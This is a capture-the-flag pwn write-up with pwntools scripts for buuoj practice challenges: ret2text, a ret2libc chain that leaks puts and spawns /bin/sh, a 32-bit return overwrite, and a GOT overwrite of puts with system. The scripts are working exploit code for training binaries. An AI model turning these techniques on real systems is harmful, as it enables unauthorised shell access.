PWN1
from pwn import *
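context(log_level='debug')

# Toggle between a local copy of the binary and the remote instance.
# io = process('./pwn')
io = remote('node4j.buuoj.cn', 29139)

# Distance from the start of the overflowed buffer to the saved return
# address: 32 bytes of buffer plus 8 bytes (presumably the saved rbp).
offset = 32 + 8
padding = b'A'
# Fixed address of the function the overflow returns into.  Hard-coded, so
# this only works for a non-PIE build of exactly this binary.
vuln_addr = 0x400708

# Plain ret2text: overwrite the saved return address with vuln_addr.
# The prompt and the payload are sent as bytes; pwntools on Python 3
# expects bytes and only tolerates str with a deprecation warning.
payload = padding * offset + p64(vuln_addr)
io.sendlineafter(b"?\n", payload)
io.interactive()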
PWN2 calc
A basic Python scripting exercise: parse each arithmetic question the server prints, compute the answer, and send it back.
from pwn import *
# Verbose pwntools logging (shows every byte sent/received).
context.log_level = 'debug'
def calc(a, b, operator):
    """Compute ``a <operator> b`` for the challenge's arithmetic quiz.

    Args:
        a, b: integer operands parsed from the server's question.
        operator: one of ``"+"``, ``"-"``, ``"x"``; any other token falls
            through to division, exactly like the original if/elif chain.

    Returns:
        The result rendered with ``str`` and encoded to bytes, ready for
        ``sendline``.

    NOTE(review): the fallback is true division, so ``calc(6, 2, "/")``
    yields ``b"3.0"``.  If the server computes with C integers it may
    expect ``b"3"`` — confirm against the remote before relying on it.
    """
    ops = {
        "+": lambda x, y: x + y,
        "-": lambda x, y: x - y,
        "x": lambda x, y: x * y,
    }
    compute = ops.get(operator, lambda x, y: x / y)
    return str(compute(a, b)).encode()
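# Toggle between a local copy of the binary and the remote instance.
# io = process('./calc')
io = remote('node4.buuoj.cn', 29226)

# Skip the three banner lines printed before the first question.
for _ in range(3):
    io.recvline()

# The server asks 100 questions ending in " = what?".  Token positions
# 3 (a), 4 (operator) and 5 (b) come from the original script and are
# tied to this exact prompt wording; the delimiter is bytes because
# pwntools compares against raw socket data.
for _ in range(100):
    question = io.recvuntil(b" = what?\n")
    tokens = question.split()
    a = int(tokens[3].decode())
    operator = tokens[4].decode()
    b = int(tokens[5].decode())
    io.sendline(calc(a, b, operator))
    # Consume the server's response line before the next question.
    io.recvline()

io.interactive()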
PWN3 ret2libc
Patch the binary to use the challenge's libc and dynamic loader, so the local process runs the same libc build (and therefore the same symbol offsets) as the remote service:
# Make ./pwn load the challenge's libc-2.31.so instead of the system libc,
# and start it with the matching ld-2.31.so so the two agree with each other.
patchelf --replace-needed libc.so.6 ./libc-2.31.so ./pwn
patchelf --set-interpreter ./ld-2.31.so ./pwn
from pwn import *
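# Run the binary under the challenge's loader with its libc preloaded, so
# the local leak and offsets match the remote service.  Swap to remote()
# for the real target.
io = process(['/home/kali/Desktop/new_star/pwn2/ld-2.31.so', './pwn'],
             env={"LD_PRELOAD": '/home/kali/Desktop/new_star/pwn2/libc-2.31.so'})
elf = ELF('./pwn')
# io = remote('node4.buuoj.cn',25158)
libc = ELF('./libc-2.31.so')
context(arch=elf.arch, os='linux', log_level='debug')

# Bytes from the start of the overflowed buffer to the saved return address.
# Kept separate from the leaked address below: the original script reused
# the name `offset` for the leak and then did `offset * padding`, i.e. it
# tried to build a 0x7f...-byte payload.
offset = 40
padding = b'A'
# Fixed (non-PIE) addresses in the binary: re-enter main after the leak,
# a `pop rdi; ret` gadget, and a bare `ret` used for stack alignment.
main_addr = 0x400698
pop_rdi = 0x400753
ret_addr = 0x40050e
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# gdb.attach(io,'b *0x400530')

# Stage 1: call puts(puts@got) to leak the runtime address of puts, then
# return to main so we get a second overflow.
payload = padding * offset + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
sleep(0.5)
io.sendline(payload)

# The leaked pointer is printed raw.  A user-space x86-64 libc address
# typically has 0x7f as its most significant non-zero byte, so read up to
# that byte and zero-extend the 6 significant bytes.
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

# Sanity check before trusting the offsets: the low 12 bits of a symbol
# are page-offset bits and do not change under ASLR, so a mismatch means
# ./libc-2.31.so is not the libc the target actually runs.
if (puts_addr & 0xfff) != (libc.sym['puts'] & 0xfff):
    log.error("leaked puts does not match ./libc-2.31.so; wrong libc?")

libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(str_bin_sh))

# Stage 2: system("/bin/sh").  The extra `ret` re-aligns rsp to 16 bytes
# before system() is entered (glibc 2.27+ executes movaps on the stack in
# do_system and crashes if it is misaligned).  The trailing 8 bytes are
# a dummy return address for system().
sleep(0.5)
payload1 = padding * offset + p64(ret_addr) + p64(pop_rdi) + p64(str_bin_sh) + p64(system_addr) + padding * 8
sleep(1)
# The original left this send commented out, so stage 2 never reached the
# target; it is delivered the same way as stage 1.
io.sendline(payload1)
io.interactive()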
PWN4 ret2shellcode
Ezez..
from pwn import *
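# The target is 32-bit (the return address below is a 4-byte 0x0804xxxx
# text address), so pin the context instead of relying on pwntools'
# default: flat()/p32 then pack pointers as 4 bytes no matter what other
# scripts set.
context(arch='i386', os='linux')

# Toggle between a local copy of the binary and the remote instance.
# io = process('./pwn4')
io = remote('node4.buuoj.cn', 27632)

padding = b'I'
offset = 20            # buffer bytes before the 4-byte slot below
saved_ebp = b'a' * 4   # presumably the saved ebp; any value works
addr = 0x08048f13      # fixed address execution resumes at after `ret`
# flat() packs the int according to context (4 bytes, little-endian).
payload = flat([padding * offset, saved_ebp, addr])
io.sendline(payload)
io.interactive()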
PWN5
# Make ./pwn load the challenge's libc-2.31.so instead of the system libc,
# and start it with the matching ld-2.31.so so the two agree with each other.
patchelf --replace-needed libc.so.6 ./libc-2.31.so ./pwn
patchelf --set-interpreter ./ld-2.31.so ./pwn
Leak the puts function address.
If we overwrite the GOT entry of puts with the address of system, the next call to puts becomes a call to system and we get a shell.
What do we need, and what primitives does the program give us?
- The scanf call takes an address from us (the target of the write).
- The read call then writes whatever we send into the location we chose.
Let's organize the ideas:
- Leak the puts address -> with the matching libc, compute the libc base and from it the addresses of system and "/bin/sh".
- Overwrite the puts entry in the GOT (puts@got).
- When the program calls puts, it jumps through puts@got to the real puts address.
So we can use the read primitive to replace the real puts address in the GOT with the address of system.
from pwn import *
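context(arch='amd64', os='linux', log_level='debug')
# Toggle between a local copy of the binary and the remote instance.
# io= process('pwn5')
io = remote('node4.buuoj.cn', 27112)
elf = ELF('pwn5')
libc = ELF('./libc-2.31.so')

# The first line is a banner; the second line is the runtime address of
# puts, printed by the challenge as hex text.
io.recvline()
puts_got = elf.got['puts']
puts_addr = int(io.recvline().decode().strip(), 16)
info("PUTS_GOT == %s " % hex(puts_got))
info("PUTS_GOT_ORIGINAL == %s" % p64(puts_got))
info("PUTS_ADDR == %s " % hex(puts_addr))

# Sanity check before writing to the GOT: the low 12 bits of a symbol are
# page-offset bits that survive ASLR, so a mismatch means ./libc-2.31.so
# is not the libc the target actually runs and system_addr would be wrong.
if (puts_addr & 0xfff) != (libc.sym['puts'] & 0xfff):
    log.error("leaked puts does not match ./libc-2.31.so; wrong libc?")

libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
info("libc == %s" % libc)
info("libc_base == %s" % hex(libc_base))
info("system_addr == %s" % hex(system_addr))

# Arbitrary write: the program asks for an address (sent as hex text) and
# then for content to store there.  Point it at puts@got and replace the
# entry with system, so the program's next puts() call runs system()
# instead.  Prompt and data are bytes, as pwntools expects on Python 3.
payload = p64(system_addr)
io.sendline(hex(puts_got).encode())
io.sendlineafter(b"now input your content:\n", payload)
io.interactive()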
PWN5 Reference
https://blog.csdn.net/xiangbaohui/article/details/122547009
https://blog.csdn.net/qq_52126646/article/details/119494939